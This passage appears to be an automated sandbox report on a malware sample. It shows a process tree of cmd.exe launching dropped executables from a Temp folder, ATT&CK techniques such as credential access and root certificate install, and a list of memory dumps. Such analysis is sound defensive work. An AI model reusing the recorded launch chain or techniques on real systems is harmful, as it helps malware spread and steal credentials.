    - Loads dropped DLL
    PID:1732
  - - C:\Users\Admin\AppData\Local\Temp\7zSCD50CB66\Mon2050daa466f6f.exe
      Mon2050daa466f6f.exe /mixone
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious behavior: GetForegroundWindowSpam
      PID:824
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon209df24d5e8f7.exe
    3⤵
    - Loads dropped DLL
    PID:1912
  - - C:\Users\Admin\AppData\Local\Temp\7zSCD50CB66\Mon209df24d5e8f7.exe
      Mon209df24d5e8f7.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetThreadContext
      PID:1844
    - - C:\Users\Admin\AppData\Local\Temp\7zSCD50CB66\Mon209df24d5e8f7.exe
        
        Mon209df24d5e8f7.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2180
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon20e7747f4ca9880.exe
    3⤵
    - Loads dropped DLL
    PID:972
  - - C:\Users\Admin\AppData\Local\Temp\7zSCD50CB66\Mon20e7747f4ca9880.exe
      Mon20e7747f4ca9880.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1576
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon204858e151.exe
    3⤵
    - Loads dropped DLL
    PID:1532
  - - C:\Users\Admin\AppData\Local\Temp\7zSCD50CB66\Mon204858e151.exe
      Mon204858e151.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetThreadContext
      PID:1676
    - - C:\Users\Admin\AppData\Local\Temp\7zSCD50CB66\Mon204858e151.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSCD50CB66\Mon204858e151.exe
        5⤵
        Executes dropped EXE
        
        PID:3036
    - - C:\Users\Admin\AppData\Local\Temp\7zSCD50CB66\Mon204858e151.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSCD50CB66\Mon204858e151.exe
        5⤵
        Executes dropped EXE
        
        PID:2264
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 688 -s 492
    3⤵
    - Loads dropped DLL
    - Program crash
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    PID:2072

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/688-88-0x000000006B280000-0x000000006B2A6000-memory.dmp

Filesize
152KB

Download
memory/688-79-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/688-82-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/688-78-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/688-81-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/688-80-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/688-83-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/688-76-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/688-84-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/688-85-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/688-86-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/688-87-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/688-89-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/688-90-0x000000006B280000-0x000000006B2A6000-memory.dmp

Filesize
152KB

Download
memory/688-77-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/824-208-0x0000000000240000-0x0000000000289000-memory.dmp

Filesize
292KB

Download
memory/824-197-0x0000000002F20000-0x0000000002F49000-memory.dmp

Filesize
164KB

Download
memory/824-211-0x0000000000400000-0x0000000002DBD000-memory.dmp

Filesize
41.7MB

Download
memory/912-273-0x0000000002570000-0x000000000261D000-memory.dmp

Filesize
692KB

Download
memory/912-274-0x00000000026D0000-0x000000000277C000-memory.dmp

Filesize
688KB

Download
memory/1200-217-0x0000000002A90000-0x0000000002AA6000-memory.dmp

Filesize
88KB

Download
memory/1500-55-0x0000000074F21000-0x0000000074F23000-memory.dmp

Filesize
8KB

Download
memory/1528-179-0x0000000002EA0000-0x0000000002EB0000-memory.dmp

Filesize
64KB

Download
memory/1528-201-0x0000000000240000-0x0000000000249000-memory.dmp

Filesize
36KB

Download
memory/1528-205-0x0000000000400000-0x0000000002DA4000-memory.dmp

Filesize
41.6MB

Download
memory/1608-218-0x0000000000E60000-0x0000000000E61000-memory.dmp

Filesize
4KB

Download
memory/1608-229-0x0000000002360000-0x0000000002361000-memory.dmp

Filesize
4KB

Download
memory/1640-198-0x0000000001830000-0x000000000187F000-memory.dmp

Filesize
316KB

Download
memory/1640-216-0x0000000000400000-0x00000000016FB000-memory.dmp

Filesize
19.0MB

Download
memory/1640-204-0x0000000000330000-0x00000000003BE000-memory.dmp

Filesize
568KB

Download
memory/1676-220-0x0000000000C40000-0x0000000000C41000-memory.dmp

Filesize
4KB

Download
memory/1676-230-0x0000000004C60000-0x0000000004C61000-memory.dmp

Filesize
4KB

Download
memory/1784-231-0x0000000001F50000-0x0000000002B9A000-memory.dmp

Filesize
12.3MB

Download
memory/1784-228-0x0000000001F50000-0x0000000002B9A000-memory.dmp

Filesize
12.3MB

Download
memory/1784-224-0x0000000001F50000-0x0000000002B9A000-memory.dmp

Filesize
12.3MB

Download
memory/1844-206-0x0000000000280000-0x0000000000286000-memory.dmp

Filesize
24KB

Download
memory/1844-183-0x00000000002D0000-0x00000000002D6000-memory.dmp

Filesize
24KB

Download
memory/2072-223-0x0000000000550000-0x0000000000551000-memory.dmp

Filesize
4KB

Download
memory/2180-215-0x0000000000400000-0x000000000040B000-memory.dmp

Filesize
44KB

Download
memory/2180-214-0x0000000000400000-0x000000000040B000-memory.dmp

Filesize
44KB

Download
memory/2180-207-0x0000000000400000-0x000000000040B000-memory.dmp

Filesize
44KB

Download
memory/2264-275-0x0000000004AA0000-0x0000000004AA1000-memory.dmp

Filesize
4KB

Download
memory/2560-227-0x0000000000B50000-0x0000000000B51000-memory.dmp

Filesize
4KB

Download
memory/3012-248-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/3012-247-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/3012-246-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/3012-276-0x0000000004DE0000-0x0000000004DE1000-memory.dmp

Filesize
4KB

Download